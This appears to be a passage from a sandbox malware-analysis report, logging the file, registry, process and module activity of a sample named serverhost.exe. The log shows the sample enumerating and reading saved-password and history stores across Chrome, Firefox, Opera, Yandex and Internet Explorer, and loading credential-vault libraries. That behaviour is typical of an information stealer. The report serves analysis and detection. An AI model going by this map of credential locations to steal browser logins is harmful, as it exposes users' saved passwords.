| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost_lng.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat | type = size |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\history.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite | type = time |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\nss3.dll | type = file_attributes |
|
3 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\logins.json | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\signons.sqlite | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\sqlite3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Firefox\mozsqlite3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Sea Monkey\nss3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal | type = file_attributes |
|
2 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data | type = size, size_out = 0 |
|
5 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal | type = file_attributes |
|
2 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal | type = file_attributes |
|
2 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data | type = size, size_out = 0 |
|
5 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal | type = file_attributes |
|
2 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\pnacl\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\pnacl\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwiftShader\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwiftShader\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Apple Computer\Preferences\keychain.plist | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera\Opera\wand.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera\Opera7\profile\wand.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera Software\Opera Stable\Login Data | type = file_attributes |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 8, size_out = 8 |
|
124 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 256, size_out = 256 |
|
114 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | size = 384, size_out = 384 |
|
10 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat | size = 8, size_out = 8 |
|
124 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat | size = 256, size_out = 256 |
|
114 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat | size = 384, size_out = 384 |
|
10 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | size = 8, size_out = 8 |
|
80 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | size = 256, size_out = 256 |
|
12 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | size = 384, size_out = 384 |
|
2 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat | size = 32, size_out = 32 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat | size = 8, size_out = 8 |
|
92 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat | size = 256, size_out = 256 |
|
4 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data | size = 100, size_out = 100 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data | size = 2048, size_out = 2048 |
|
4 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data | size = 16, size_out = 16 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data | size = 100, size_out = 100 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data | size = 2048, size_out = 2048 |
|
2 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data | size = 16, size_out = 16 |
|
1 | |
| Write | C:\ProgramData\C571.tmp | size = 3 |
|
1 | |
| Write | C:\ProgramData\C571.tmp | size = 1 |
|
8 | |
| Write | C:\ProgramData\C571.tmp | size = 11 |
|
1 | |
| Write | C:\ProgramData\C571.tmp | size = 9 |
|
1 | |
| Write | C:\ProgramData\C571.tmp | size = 8 |
|
1 | |
| Write | C:\ProgramData\C571.tmp | size = 17 |
|
1 | |
| Write | C:\ProgramData\C571.tmp | size = 15 |
|
1 | |
| Write | C:\ProgramData\C571.tmp | size = 14 |
|
1 | |
| Write | C:\ProgramData\C571.tmp | size = 12 |
|
1 | |
| Write | C:\ProgramData\C571.tmp | size = 13 |
|
1 | |
| Write | C:\ProgramData\C571.tmp | size = 2 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin |
|
3 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin | value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin | value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin | value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | System | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sdclt.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\argentina conducting merchandise.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\rundll32.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sc.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\dvd maker\lyrics-morning-effectiveness.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\involved-int-antenna-lol.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\dvd maker\food_logos_lot.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\designed.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\chargetrackbacksobserve.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\info-began-nobody-tops.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\myers biggest qatar.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\google\invalid.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows nt\panel-maria-suggestion.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\remained universe sole.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\evanescence oscar em.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\reference assemblies\fifth roller.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\irish.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\advocate-keep.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\distributors.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft.net\lighter.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\lease-entitled-pcs.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\nerve-bracelet.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\office15\winword.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | comctl32.dll | base_address = 0x6eb50000 |
|
1 | |
| Load | shell32.dll | base_address = 0x758a0000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x764f0000 |
|
2 | |
| Load | pstorec.dll | base_address = 0x71ec0000 |
|
1 | |
| Load | vaultcli.dll | base_address = 0x6f4d0000 |
|
1 | |
| Load | C:\Program Files\Mozilla Firefox\nss3.dll | base_address = 0x63270000 |
|
1 | |
| Load | psapi.dll | base_address = 0x773f0000 |
|
1 | |
| Get Handle | private_0x0000000000400000 | base_address = 0x400000 |
|
22 | |
| Get Handle | C:\Program Files\Mozilla Firefox\nss3.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\program files\mozilla firefox\nss3.dll | base_address = 0x63270000 |
|
2 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76590000 |
|
1 | |
| Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
2 | ||
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\windows\system32\taskhost.exe, file_name_orig = C:\Windows\system32\taskhost.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\windows\system32\dwm.exe, file_name_orig = C:\Windows\system32\Dwm.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\windows\explorer.exe, file_name_orig = C:\Windows\Explorer.EXE, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\windows\system32\taskeng.exe, file_name_orig = C:\Windows\system32\taskeng.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\windows\system32\sdclt.exe, file_name_orig = C:\Program Files\Common Files\blowiranlaboratorydisaster.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\internet explorer\argentina conducting merchandise.exe, file_name_orig = C:\Program Files\Internet Explorer\argentina conducting merchandise.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\windows\system32\rundll32.exe, file_name_orig = C:\Program Files\Microsoft Analysis Services\output.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\windows\system32\sc.exe, file_name_orig = C:\Program Files\Adobe\bookings.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\dvd maker\lyrics-morning-effectiveness.exe, file_name_orig = C:\Program Files\DVD Maker\lyrics-morning-effectiveness.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\windows defender\involved-int-antenna-lol.exe, file_name_orig = C:\Program Files\Windows Defender\involved-int-antenna-lol.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\windows\system32\conhost.exe, file_name_orig = C:\Program Files\Microsoft Office\enterprise monsters comments.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\dvd maker\food_logos_lot.exe, file_name_orig = C:\Program Files\DVD Maker\food_logos_lot.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\windows sidebar\designed.exe, file_name_orig = C:\Program Files\Windows Sidebar\designed.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\microsoft office\chargetrackbacksobserve.exe, file_name_orig = C:\Program Files\Microsoft Office\chargetrackbacksobserve.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\msbuild\info-began-nobody-tops.exe, file_name_orig = C:\Program Files\MSBuild\info-began-nobody-tops.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\uninstall information\myers biggest qatar.exe, file_name_orig = C:\Program Files\Uninstall Information\myers biggest qatar.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\google\invalid.exe, file_name_orig = C:\Program Files\Google\invalid.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\windows nt\panel-maria-suggestion.exe, file_name_orig = C:\Program Files\Windows NT\panel-maria-suggestion.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\windows mail\remained universe sole.exe, file_name_orig = C:\Program Files\Windows Mail\remained universe sole.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\internet explorer\evanescence oscar em.exe, file_name_orig = C:\Program Files\Internet Explorer\evanescence oscar em.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\reference assemblies\fifth roller.exe, file_name_orig = C:\Program Files\Reference Assemblies\fifth roller.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\windows sidebar\irish.exe, file_name_orig = C:\Program Files\Windows Sidebar\irish.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\microsoft analysis services\advocate-keep.exe, file_name_orig = C:\Program Files\Microsoft Analysis Services\advocate-keep.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\microsoft office\distributors.exe, file_name_orig = C:\Program Files\Microsoft Office\distributors.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\microsoft.net\lighter.exe, file_name_orig = C:\Program Files\Microsoft.NET\lighter.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\windows sidebar\lease-entitled-pcs.exe, file_name_orig = C:\Program Files\Windows Sidebar\lease-entitled-pcs.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\windows media player\nerve-bracelet.exe, file_name_orig = C:\Program Files\Windows Media Player\nerve-bracelet.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Office15\WINWORD.EXE, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Get Filename | C:\Program Files\Mozilla Firefox\nss3.dll | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = InitCommonControlsEx, address_out = 0x6eb56be6 |
|
1 | |
